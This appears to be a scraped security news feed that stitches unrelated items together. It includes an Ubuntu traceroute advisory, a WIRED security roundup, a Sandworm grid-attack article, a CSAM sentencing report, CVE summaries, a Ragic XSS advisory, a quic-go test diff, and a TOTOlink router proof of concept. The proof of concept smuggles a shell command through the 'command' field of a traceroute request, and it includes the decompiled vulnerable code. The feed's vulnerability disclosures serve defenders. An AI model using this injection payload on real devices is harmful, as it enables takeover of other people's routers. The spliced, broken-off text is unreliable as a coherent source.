Ubuntu Security Notice 6478-1 - It was discovered that Traceroute did not properly parse command line arguments. An attacker could possibly use this issue to execute arbitrary commands.

==========================================================================  
Ubuntu Security Notice USN-6478-1  
November 14, 2023

traceroute vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Traceroute could be made to execute arbitrary commands.

Software Description:  
- traceroute: Traces the route taken by packets over an IPv4/IPv6 network

Details:

It was discovered that Traceroute did not properly parse command  
line arguments. An attacker could possibly use this issue to  
execute arbitrary commands.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
   traceroute                      1:2.1.0-2ubuntu0.22.04.1~esm1

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
   traceroute                      1:2.1.0-2ubuntu0.20.04.1~esm1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   traceroute                      1:2.1.0-2ubuntu0.18.04.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   traceroute                      1:2.0.21-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   traceroute                      1:2.0.20-0ubuntu0.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6478-1  
   CVE-2023-46316

Ubuntu Security Notice USN-6478-1

Netflix, Spotify, Twitter, PayPal, Slack. All down for millions of people. How a group of teen friends plunged into an underworld of cybercrime and broke the internet—then went to work for the FBI.

The Mirai Confessions: Three Young Hackers Who Built a Web-Killing Monster Finally Tell Their Story

Plus: A DDoS attack shuts down ChatGPT, Lockbit shuts down a bank, and a communications breakdown between politicians and Big Tech.

Drones, hidden cameras, thermal vision scopes—these are just a few examples of the high-tech equipment recommended by the animal liberation group Direct Action Everywhere, according to a manual released by the organization this week. The document, which was reviewed by WIRED, is a rare glimpse into how the organization is using tech to target factory farms in often brazen operations that have rescued pigs, goats, ducks, and chickens.

Extremist groups are experimenting with generative AI to flood social media with propaganda and misinformation, researchers at Tech Against Terrorism have told WIRED. A new report from the group details how, in recent months, terrorists and other extremist organizations have been using artificial intelligence to manipulate imagery and thwart content moderation. As platforms have struggled to keep up with this flood of extremist content, a new tool called Altitude, built in collaboration between Tech Against Terrorism and Google, is seeking to address the problem. The tool centralizes the collection of verified terrorist content, allowing companies to easily vet posts shared to their platforms.

Israel is exacerbating the humanitarian catastrophe in Gaza by likely imposing devastating internet blackouts in the region. Last week, Israel reportedly imposed a full internet shutdown in the area as its troops moved into the Gaza Strip. After internet access was restored, the area suffered two additional connectivity blackouts. The most recent lasted for about 15 hours on Sunday as Israel was carrying out an intense operation to cut off Gaza City in the north from southern Gaza.

In other infrastructure news, a report from the ​​cybersecurity firm Mandiant reveals that last year, the Russian military intelligence agency known as Sandworm carried out a power grid attack targeting a Ukrainian electric utility causing a blackout for Ukrainian civilians. According to the report, the cyberattack coincided with the start of a series of missile strikes targeting Ukrainian critical infrastructure across the country.

The third GOP presidential primary debate was livestreamed on Rumble, a YouTube alternative home to what the Southern Poverty Law Center says is one of America’s most notorious white nationalists, Nick Fuentes. Since the outbreak of the Israel-Hamas conflict last month, Fuentes has used his Rumble channel to push antisemitic hate speech and Holocaust denial conspiracies, racking up hundreds of thousands of views. Fuentes’ YouTube account was terminated in 2020 after Google demonetized it.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there

On Wednesday, you and everyone you know had trouble getting ChatGPT to ghostwrite their emails as developer OpenAI was hit by what it thought was a distributed denial-of-service attack. For nearly two hours, users who tried to access the chatbot were greeted with a message telling them “ChatGPT is at capacity right now.”

In a tweet, OpenAI CEO Sam Altman initially blamed its outage on a surge in interest in the platform's new features. By Wednesday night the company announced that the periodic outages were due to an “abnormal traffic pattern reflective of a DDoS attack.”

While it’s unclear who is behind the attack, a group known as Anonymous Sudan claimed responsibility on Wednesday, posting on Telegram that it had targeted OpenAI for "general biases towards Israel and against Palestine." OpenAI has since resolved the issue.

The US arm of the Industrial and Commercial Bank of China was hit by a ransomware attack that disrupted trades in the US Treasury market on Thursday. The bank appears to be the latest victim of the prolific ransomware gang known as Lockbit. According to the US Cybersecurity and Infrastructure Security Agency, Lockbit has hit 1,700 US organizations since 2020 and extorted more than $100 million in ransom demands. Last month it threatened Boeing with a leak of sensitive data.

"ICBC has been closely monitoring the matter and has done its best in emergency response and supervisory communication," China's foreign ministry spokesperson Wang Wenbin said at a press conference.

Signal is beta testing usernames that will allow people to communicate using the encrypted service without exchanging phone numbers, further enhancing the app's privacy applications. The feature will go live in early 2024.

Support for usernames is a major step for the messaging service as Signal has apparently been working on the feature for years. Though accounts will still need to be associated with a phone number at setup, the introduction of usernames will allow users to connect without having to share it.

Cooperation between government, researchers, and tech companies aimed at countering disinformation online is evaporating thanks to a sustained campaign by US Republicans in the press, courts, and on Capitol Hill. Tech employees tell NBC the FBI has halted communications with social media firms about foreign influence campaigns, a move the FBI director attributed to a September ruling in the country's most conservative appellate court forbidding the government from "significantly" encouraging social media companies to remove misinformation.

“We’re having some interaction with social media companies,” FBI director Christopher Wray said in testimony last week to the Senate Homeland Security Committee. “But all of those interactions have changed fundamentally in the wake of the court rulings.”

According to NBC, all the FBI’s interactions with tech platforms now have to be supervised by Justice Department lawyers.

Signal Is Finally Testing Usernames

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 3 and Nov. 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for November 3 to November 10

Russia's most notorious military hackers successfully sabotaged Ukraine's power grid for the third time last year. And in this case, the blackout coincided with a physical attack.

The notorious unit of Russia's GRU military intelligence agency known as Sandworm remains the only team of hackers to have ever triggered blackouts with their cyberattacks, turning off the lights for hundreds of thousands of Ukrainian civilians not once, but twice within the past decade. Now it appears that in the midst of Russia's full-scale war in Ukraine, the group has achieved another dubious distinction in the history of cyberwar: It targeted civilians with a blackout attack at the same time missile strikes hit their city, an unprecedented and brutal combination of digital and physical warfare.

Cybersecurity firm Mandiant today revealed that Sandworm, a cybersecurity industry name for Unit 74455 of Russia's GRU spy agency, carried out a third successful power grid attack targeting a Ukrainian electric utility in October of last year, causing a blackout for an unknown number of Ukrainian civilians. In this case, unlike any previous hacker-induced blackouts, Mandiant says the cyberattack coincided with the start of a series of missile strikes targeting Ukrainian critical infrastructure across the country, which included victims in the same city as the utility where Sandworm triggered its power outage. Two days after the blackout, the hackers also used a piece of data-destroying "wiper" malware to erase the contents of computers across the utility's network, perhaps in an attempt to destroy evidence that could be used to analyze their intrusion.

Mandiant, which has worked closely with the Ukrainian government on digital defense and investigations of network breaches since the start of the Russian invasion in February of 2022, declined to name the targeted electric utility or the city where it was located. Nor would it offer information like the length of the resulting power loss or the number of civilians affected.

Mandiant does note in its report on the incident that as early as two weeks before the blackout, Sandworm's hackers appear to have already possessed all the access and capabilities necessary to hijack the industrial control system software that oversees the flow of power at the utility's electrical substations. Yet it appears to have waited to carry out the cyberattack until the day of Russia's missile strikes. While that timing may be coincidental, it more likely suggests coordinated cyber and physical attacks, perhaps designed to sow chaos ahead of those air strikes, complicate any defense against them, or add to their psychological effect on civilians.

"The cyber incident exacerbates the impact of the physical attack," says John Hultquist, Mandiant's head of threat intelligence, who has tracked Sandworm for nearly a decade and named the group in 2014. "Without seeing their actual orders, it's really hard on our side to make a determination of whether or not that was on purpose. I will say that this was carried out by a military actor and coincided with another military attack. If it was a coincidence, it was a terribly interesting coincidence."

Nimbler, Stealthier Cybersaboteurs

The Ukrainian government's cybersecurity agency, SSSCIP, declined to fully confirm Mandiant's findings in response to a request from WIRED, but it didn't dispute them. SSSCIP's deputy chair, Viktor Zhora, wrote in a statement that the agency responded to the breach last year, working with the victim to "minimize and localize the impact." In an investigation over the two days following the near-simultaneous blackout and missile strikes, he says, the agency confirmed that the hackers had found a "bridge" from the utility's IT network to its industrial control systems and planted malware there capable of manipulating the grid.

Mandiant's more detailed breakdown of the intrusion shows how the GRU's grid hacking has evolved over time to become far more stealthy and nimble. In this latest blackout attack, the group used a "living off the land" approach that has become more common among state-sponsored hackers seeking to avoid detection. Instead of deploying their own custom malware, they exploited the legitimate tools already present on the network to spread from machine to machine before finally running an automated script that used their access to the facility's industrial control system software, known as MicroSCADA, to cause the blackout.

In Sandworm's 2017 blackout that hit a transmission station north of the capital of Kyiv, by contrast, the hackers used a custom-built piece of malware known as Crash Override or Industroyer, capable of automatically sending commands over several protocols to open circuit-breakers. In another Sandworm power grid attack in 2022, which the Ukrainian government has described as a failed attempt to trigger a blackout, the group used a newer version of that malware known as Industroyer2.

Sandworm Hackers Caused Another Blackout in Ukraine—During a Missile Strike

By Waqas
You reap what you sow!
This is a post from HackRead.com Read the original post: US Man Sentenced to Over 21 Years for Dark Web Distribution of CSAM

In April 2023, Austen Peppers from Lawton, Oklahoma, pleaded guilty to advertising and distributing child sexual abuse material (CSAM) on the dark web.

Austen Peppers, a 36-year-old resident of Lawton, Oklahoma, faced the gavel and received a sentencing of 21 years and 10 months in prison, followed by 15 years of supervised release. This judgment came after Peppers was **found guilty** in April 2023, of the advertising and distribution of child sexual abuse material (CSAM) on the dark web, as announced by U.S. Attorney Phillip A. Talbert.

The distribution of CSAM has emerged as a significant challenge for law enforcement, exacerbated by AI services capable of generating harmful images. Recently, the Internet Watch Foundation, a UK-based internet watchdog, **revealed that** cybercriminals are turning to generative AI platforms to create child sexual abuse material (CSAM).

The court documents unveiled a disturbing timeline spanning from March 2018 to August 2019, during which Peppers was involved in the sale and solicitation of images portraying minors subjected to sexual abuse. His transactions were executed in the shadows of the **dark web**, employing cryptocurrency, and utilizing platforms that he believed shielded him from law enforcement scrutiny.

Peppers also engaged in explicit conversations with individuals he believed were minors, persuading them to create sexually explicit self-images. Shockingly, Peppers accumulated an extensive library of thousands of images and videos depicting children suffering sexual abuse.

According to a **press release** from the US Department of Justice (DoJ),, Austen Peppers has been in confinement since his initial appearance in court on November 14, 2019. As part of the sentencing, Peppers was also directed to pay restitution of $57,000 to 19 victims who suffered due to his vile actions.

This case highlights the dangers posed by individuals utilizing the anonymity of the dark web for criminal activities, especially those exploiting and abusing minors. Engaging in illegal activities, particularly heinous crimes such as the distribution of CSAM, on the dark web is a serious offence that should be strictly avoided.

Hackread.com has consistently cautioned users about the dangerous nature of the illicit sections of the dark web, emphasizing the importance of refraining from engaging in unlawful actions while navigating its depths. To gain a deeper understanding of the potential risks and the activities that should be avoided on the dark web, you can explore further details **here**.

****_RELATED ARTICLES_****

1.  Dark Web’s worst pedophile sentenced to 32 years in prison
2.  NHS Psychiatrist Jailed; Dark Web Forum and 7,000 Images Seized
3.  Creators of dark web chat room arrested for facilitating child abuse
4.  210 days prison for crypto CEO who held 13k child abuse, beastiality files
5.  School Principal Gets 9 Years in Prison for Trading Nude Pictures of Students

US Man Sentenced to Over 21 Years for Dark Web Distribution of CSAM

In Eclipse Glassfish 5 or 6, running with old versions of JDK (lower than 6u211, or < 7u201, or < 8u191), allows remote attackers to load malicious code on the server via access to insecure ORB listeners.


CVE-2023-5763: Eclipse GlassFish Security Guide, Release 7

Rogic No-Code Database Builder's file uploading function has insufficient filtering for special characters. A remote attacker with regular user privilege can inject JavaScript to perform XSS (Stored Cross-Site Scripting) attack.

:::

*   勒索軟體防護專區
*   遠距辦公資安專區
*   回首頁
*   網站導覽
*   訂閱電子報
*   English

****

*   資安通報
*   Wannacry
*   駭客
*   勒索
*   手機

*   新聞公告News
    *   公告事項
    *   資安新聞
    *   資安活動
    *   電子報
*   資安服務Services
    *   資安通報
        *   一般資安通報
    *   資安聯盟
        *   資安聯盟簡介
        *   規章及會員申請暨異動申請
    *   台灣漏洞揭露平台 (TVN)
        *   TVN (Taiwan Vulnerability Note) 漏洞公告
        *   漏洞揭露政策
        *   漏洞通報
    *   惡意檔案檢測服務 (Virus Check)
    *   網路釣魚通報 (Phishing Check)
        *   網路釣魚通報
        *   釣魚網站列表
*   資安宣導Advocacy
    *   勒索軟體威脅防護專區
    *   遠距辦公資安專區
    *   企業資安事件應變處理指南
    *   威脅分析報告
    *   資安小知識
    *   資訊安全宣導
    *   資安宣導影音
    *   公開文件
*   相關網站Links
    *   國內資安組織
    *   國際資安組織
    *   網路資源
*   關於我們About us
    *   中心簡介
    *   活動紀事
        *   歷年年會活動網站
        *   活動花絮
    *   PGP KEY
    *   聯絡我們
    *   合作夥伴

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202311001

CVE ID

CVE-2023-41343

CVSS

5.4 (Medium)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

影響產品

企業雲端資料庫: 修補前所有版本

問題描述

立即科技 Ragic 企業雲端資料庫檔案上傳功能未過濾特殊字元。遠端攻擊者以一般使用者權限登入後，可注入JavaScript語法，進行儲存式XSS(Stored Cross-site scripting)攻擊。

解決方法

更新系統至最新版本

漏洞通報者

Vicky Tsai (Acer Cyber Security)

公開日期

2023-11-03

CVE-2023-41343: 立即科技 Ragic 企業雲端資料庫 - Stored XSS

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.

**TOTOlink X6000R V9.4.0cu.852\_B20230719 command injection****Produce information**

Device：TOTOlink X6000R  
Firmware version：V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

Arbitrary command execution exists on the setTracerouteCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 76Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}

Inject the command “ls>/web/tes2t.txt”

Injection result:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test3.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analyse**

The function in the shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_415950(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x0  unsigned int v6; // w0  char s[256]; // [xsp+38h] [xbp+38h] BYREF  memset(s, 0, sizeof(s));  v4 = (const char *)sub_40BD6C(a1, "command");  v5 = (const char *)sub_40BD6C(a1, "num");  v6 = atoi(v5);  if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 )    __break(0x3E8u);  CsteSystem(s, 0LL);  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is a command splicing that bypasses execution without any filtering!

CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)

quic-go is an implementation of the QUIC protocol in Go. Starting in version 0.37.0 and prior to version 0.37.3, by serializing an ACK frame after the CRYTPO that allows a node to complete the handshake, a remote node could trigger a nil pointer dereference (leading to a panic) when the node attempted to drop the Handshake packet number space. An attacker can bring down a quic-go node with very minimal effort. Completing the QUIC handshake only requires sending and receiving a few packets. Version 0.37.3 contains a patch. Versions before 0.37.0 are not affected.

Expand Up @@ -1891,7 +1891,6 @@ var \_ = Describe("Connection", func() {  
It("cancels the HandshakeComplete context when the handshake completes", func() { packer.EXPECT().PackCoalescedPacket(false, gomock.Any(), conn.version).AnyTimes() finishHandshake := make(chan struct{}) sph := mockackhandler.NewMockSentPacketHandler(mockCtrl) conn.sentPacketHandler \= sph tracer.EXPECT().DroppedEncryptionLevel(protocol.EncryptionHandshake) Expand All @@ -1901,53 +1900,26 @@ var \_ = Describe("Connection", func() { sph.EXPECT().DropPackets(protocol.EncryptionHandshake) sph.EXPECT().SetHandshakeConfirmed() connRunner.EXPECT().Retire(clientDestConnID) go func() { defer GinkgoRecover() <-finishHandshake cryptoSetup.EXPECT().StartHandshake() cryptoSetup.EXPECT().NextEvent().Return(handshake.Event{Kind: handshake.EventHandshakeComplete}) cryptoSetup.EXPECT().NextEvent().Return(handshake.Event{Kind: handshake.EventNoEvent}) cryptoSetup.EXPECT().SetHandshakeConfirmed() cryptoSetup.EXPECT().GetSessionTicket() conn.run() }() cryptoSetup.EXPECT().SetHandshakeConfirmed() cryptoSetup.EXPECT().GetSessionTicket() handshakeCtx := conn.HandshakeComplete() Consistently(handshakeCtx).ShouldNot(BeClosed()) close(finishHandshake) Expect(conn.handleHandshakeComplete()).To(Succeed()) Eventually(handshakeCtx).Should(BeClosed()) // make sure the go routine returns streamManager.EXPECT().CloseWithError(gomock.Any()) expectReplaceWithClosed() packer.EXPECT().PackApplicationClose(gomock.Any(), gomock.Any(), conn.version).Return(&coalescedPacket{buffer: getPacketBuffer()}, nil) cryptoSetup.EXPECT().Close() mconn.EXPECT().Write(gomock.Any(), gomock.Any()) tracer.EXPECT().ClosedConnection(gomock.Any()) tracer.EXPECT().Close() conn.shutdown() Eventually(conn.Context().Done()).Should(BeClosed()) })  
It("sends a session ticket when the handshake completes", func() { const size \= protocol.MaxPostHandshakeCryptoFrameSize \* 3 / 2 packer.EXPECT().PackCoalescedPacket(false, gomock.Any(), conn.version).AnyTimes() finishHandshake := make(chan struct{}) connRunner.EXPECT().Retire(clientDestConnID) conn.sentPacketHandler.DropPackets(protocol.EncryptionInitial) tracer.EXPECT().DroppedEncryptionLevel(protocol.EncryptionHandshake) go func() { defer GinkgoRecover() <-finishHandshake cryptoSetup.EXPECT().StartHandshake() cryptoSetup.EXPECT().NextEvent().Return(handshake.Event{Kind: handshake.EventHandshakeComplete}) cryptoSetup.EXPECT().NextEvent().Return(handshake.Event{Kind: handshake.EventNoEvent}) cryptoSetup.EXPECT().SetHandshakeConfirmed() cryptoSetup.EXPECT().GetSessionTicket().Return(make(\[\]byte, size), nil) conn.run() }() cryptoSetup.EXPECT().SetHandshakeConfirmed() cryptoSetup.EXPECT().GetSessionTicket().Return(make(\[\]byte, size), nil)  
handshakeCtx := conn.HandshakeComplete() Consistently(handshakeCtx).ShouldNot(BeClosed()) close(finishHandshake) Expect(conn.handleHandshakeComplete()).To(Succeed()) var frames \[\]ackhandler.Frame Eventually(func() \[\]ackhandler.Frame { frames, \_ \= conn.framer.AppendControlFrames(nil, protocol.MaxByteCount, protocol.Version1) Expand All @@ -1963,16 +1935,6 @@ var \_ = Describe("Connection", func() { } } Expect(size).To(BeEquivalentTo(s)) // make sure the go routine returns streamManager.EXPECT().CloseWithError(gomock.Any()) expectReplaceWithClosed() packer.EXPECT().PackApplicationClose(gomock.Any(), gomock.Any(), conn.version).Return(&coalescedPacket{buffer: getPacketBuffer()}, nil) cryptoSetup.EXPECT().Close() mconn.EXPECT().Write(gomock.Any(), gomock.Any()) tracer.EXPECT().ClosedConnection(gomock.Any()) tracer.EXPECT().Close() conn.shutdown() Eventually(conn.Context().Done()).Should(BeClosed()) })  
It("doesn't cancel the HandshakeComplete context when the handshake fails", func() { Expand Down Expand Up @@ -2027,6 +1989,7 @@ var \_ = Describe("Connection", func() { cryptoSetup.EXPECT().SetHandshakeConfirmed() cryptoSetup.EXPECT().GetSessionTicket() mconn.EXPECT().Write(gomock.Any(), gomock.Any()) Expect(conn.handleHandshakeComplete()).To(Succeed()) conn.run() }() Eventually(done).Should(BeClosed()) Expand Down Expand Up @@ -2350,6 +2313,7 @@ var \_ = Describe("Connection", func() { cryptoSetup.EXPECT().NextEvent().Return(handshake.Event{Kind: handshake.EventNoEvent}) cryptoSetup.EXPECT().GetSessionTicket().MaxTimes(1) cryptoSetup.EXPECT().SetHandshakeConfirmed().MaxTimes(1) Expect(conn.handleHandshakeComplete()).To(Succeed()) err := conn.run() nerr, ok := err.(net.Error) Expect(ok).To(BeTrue()) Expand Down Expand Up @@ -2867,7 +2831,10 @@ var \_ = Describe("Client Connection", func() { TransportParameters: params, }) cryptoSetup.EXPECT().NextEvent().Return(handshake.Event{Kind: handshake.EventHandshakeComplete}).MaxTimes(1) cryptoSetup.EXPECT().NextEvent().Return(handshake.Event{Kind: handshake.EventNoEvent}).MaxTimes(1) cryptoSetup.EXPECT().NextEvent().Return(handshake.Event{Kind: handshake.EventNoEvent}).MaxTimes(1).Do(func() { defer GinkgoRecover() Expect(conn.handleHandshakeComplete()).To(Succeed()) }) errChan <- conn.run() close(errChan) }() Expand Down

Tag

#acer